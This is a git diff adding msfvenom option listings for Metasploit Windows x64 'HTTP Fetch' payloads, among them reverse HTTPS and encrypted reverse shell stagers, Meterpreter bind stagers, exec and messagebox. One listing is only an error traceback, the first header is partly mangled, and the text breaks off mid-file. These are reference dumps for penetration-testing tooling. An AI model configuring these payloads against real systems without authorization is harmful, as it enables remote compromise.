b/msfvenom/payload_options/cmd-windows-http-x64-custom-reverse_winhttps.txt new file mode 100644 index 0000000..0111914 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-custom-reverse_winhttps.txt @@ -0,0 +1,101 @@ + + Name: HTTP Fetch, Windows shellcode stage, Windows x64 Reverse HTTPS Stager (winhttp) + Module: payload/cmd/windows/http/x64/custom/reverse_winhttps + Platform: Windows + Arch: cm +Evasion options for payload/cmd/windows/http/x64/custom/reverse_winhttps: +========================= + +r7 + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME HFdHiOGjV no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path +SHELLCODE_FILE no Shellcode bin to launch + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Custom shellcode stage. + + Tunnel communication over HTTPS (Windows x64 winhttp) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpProxyHost no An optional proxy server IP address or hostname + HttpProxyIE true no Enable use of IE proxy settings + HttpProxyPass no An optional proxy server password Max parameter length: 63 characters + HttpProxyPort no An optional proxy server port + HttpProxyType HTTP yes The type of HTTP proxy (Accepted: HTTP, SOCKS) + HttpProxyUser no An optional proxy server username Max parameter length: 63 characters + HttpReferer no An optional value to use for the Referer HTTP header + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 14_7_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.15 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + SSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + StagerURILength no The URI length for the stager (at least 5 bytes) + StagerVerifySSLCert false no Whether to verify the SSL certificate hash in the handler + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-encrypted_shell-reverse_tcp.txt b/msfvenom/payload_options/cmd-windows-http-x64-encrypted_shell-reverse_tcp.txt new file mode 100644 index 0000000..cc67991 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-encrypted_shell-reverse_tcp.txt @@ -0,0 +1,94 @@ + + Name: HTTP Fetch, Windows Command Shell, Encrypted Reverse TCP Stager + Module: payload/cmd/windows/http/x64/encrypted_shell/reverse_tcp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 127 + Rank: Normal + +Provided by: + Brendan Watters + Matt Graeber + Shelby Pace + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CallWSAStartup true no Adds the function that initializes the Winsock library +ChachaKey 564ca178cb11cc05b849fd30ed4ff245 no The initial key to encrypt payload traffic with +ChachaNonce fbc2e693d1fc no The initial nonce to use to encrypt payload traffic with +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME rRzVrltYfA no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Spawn a piped command shell (staged). + + Connect to MSF and read in stage + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + KeepExe false no Keep executable after compiling the payload + KeepSrc false no Keep source code after compiling it + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + OptLevel O2 no The optimization level to compile with (Accepted: Og, Os, O0, O1, O2, O3) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking true yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + ShowCompileCMD false no Display the command used to compile payload + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + StripSymbols true no Payload will be compiled without symbols + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-encrypted_shell_reverse_tcp.txt b/msfvenom/payload_options/cmd-windows-http-x64-encrypted_shell_reverse_tcp.txt new file mode 100644 index 0000000..eeda82c --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-encrypted_shell_reverse_tcp.txt @@ -0,0 +1,86 @@ + + Name: HTTP Fetch, Windows Encrypted Reverse Shell + Module: payload/cmd/windows/http/x64/encrypted_shell_reverse_tcp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 127 + Rank: Normal + +Provided by: + Brendan Watters + Matt Graeber + Shelby Pace + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CallWSAStartup true no Adds the function that initializes the Winsock library +ChachaKey dd744743740715ec998e1efd5ac41906 no The initial key to encrypt payload traffic with +ChachaNonce 6fbcbd62f796 no The initial nonce to use to encrypt payload traffic with +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME FGysnoEdPz no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Connect back to attacker and spawn an encrypted command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + KeepExe false no Keep executable after compiling the payload + KeepSrc false no Keep source code after compiling it + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + OptLevel O2 no The optimization level to compile with (Accepted: Og, Os, O0, O1, O2, O3) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking true yes Whether or not to automatically register generated UUIDs + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + ShowCompileCMD false no Display the command used to compile payload + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + StripSymbols true no Payload will be compiled without symbols + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-exec.txt b/msfvenom/payload_options/cmd-windows-http-x64-exec.txt new file mode 100644 index 0000000..9fc8997 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-exec.txt @@ -0,0 +1,61 @@ + + Name: HTTP Fetch, Windows x64 Execute Command + Module: payload/cmd/windows/http/x64/exec + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 127 + Rank: Normal + +Provided by: + Brendan Watters + sf + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD yes The command string to execute +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME ZYiHMftPEs no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Execute an arbitrary command (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-loadlibrary.txt b/msfvenom/payload_options/cmd-windows-http-x64-loadlibrary.txt new file mode 100644 index 0000000..1fb17e0 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-loadlibrary.txt @@ -0,0 +1,9 @@ +Options for payload/cmd/windows/http/x64/loadlibrary: +========================= + +/usr/share/metasploit-framework/modules/payloads/singles/windows/x64/loadlibrary.rb:58:in `generate': wrong number of arguments (given 1, expected 0) (ArgumentError) + from /usr/share/metasploit-framework/lib/msf/core/payload/adapter/fetch.rb:94:in `generate' + from /usr/share/metasploit-framework/lib/msf/core/payload.rb:195:in `size' + from /usr/share/metasploit-framework/lib/msf/base/serializer/readable_text.rb:500:in `dump_payload_module' + from /usr/share/metasploit-framework/lib/msf/base/serializer/readable_text.rb:26:in `dump_module' + from /usr/bin/msfvenom:461:in `
' diff --git a/msfvenom/payload_options/cmd-windows-http-x64-messagebox.txt b/msfvenom/payload_options/cmd-windows-http-x64-messagebox.txt new file mode 100644 index 0000000..bb25d68 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-messagebox.txt @@ -0,0 +1,63 @@ + + Name: HTTP Fetch, Windows MessageBox x64 + Module: payload/cmd/windows/http/x64/messagebox + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 125 + Rank: Normal + +Provided by: + Brendan Watters + pasta + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME biAAGvOPG no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +ICON NO yes Icon type (Accepted: NO, ERROR, INFORMATION, WARNING, QUESTION) +TEXT Hello, from MSF! yes Messagebox Text +TITLE MessageBox yes Messagebox Title + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Spawn a dialog via MessageBox using a customizable title, text & icon + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-bind_ipv6_tcp.txt b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-bind_ipv6_tcp.txt new file mode 100644 index 0000000..b3b442d --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-bind_ipv6_tcp.txt @@ -0,0 +1,89 @@ + + Name: HTTP Fetch, Windows x64 IPv6 Bind TCP Stager + Module: payload/cmd/windows/http/x64/meterpreter/bind_ipv6_tcp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 129 + Rank: Normal + +Provided by: + Brendan Watters + skape + sf + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME QvMMtlhNsuT no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Listen for an IPv6 connection (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-bind_ipv6_tcp_uuid.txt b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-bind_ipv6_tcp_uuid.txt new file mode 100644 index 0000000..8394ae7 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-bind_ipv6_tcp_uuid.txt @@ -0,0 +1,89 @@ + + Name: HTTP Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support + Module: payload/cmd/windows/http/x64/meterpreter/bind_ipv6_tcp_uuid + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 131 + Rank: Normal + +Provided by: + Brendan Watters + skape + sf + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME cQRzuQIwacZO no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +RHOST no The target address + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. + Listen for an IPv6 connection with UUID Support (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-bind_named_pipe.txt b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-bind_named_pipe.txt new file mode 100644 index 0000000..d17d085 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-meterpreter-bind_named_pipe.txt @@ -0,0 +1,96 @@ + + Name: HTTP Fetch, Windows x64 Bind Named Pipe Stager + Module: payload/cmd/windows/http/x64/meterpreter/bind_named_pipe + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 123 + Rank: Normal + +Provided by: + Brendan Watters + skape + sf + OJ Reeves + UserExistsError + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME muMiieiQ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 445 yes SMB port +PIPENAME msf-pipe yes Name of the pipe to connect to +RHOST no Host of the pipe to connect to +SMBDomain . no The Windows domain to use for authentication +SMBPass no The password for the specified username +SMBUser no The username to authenticate as + + +When 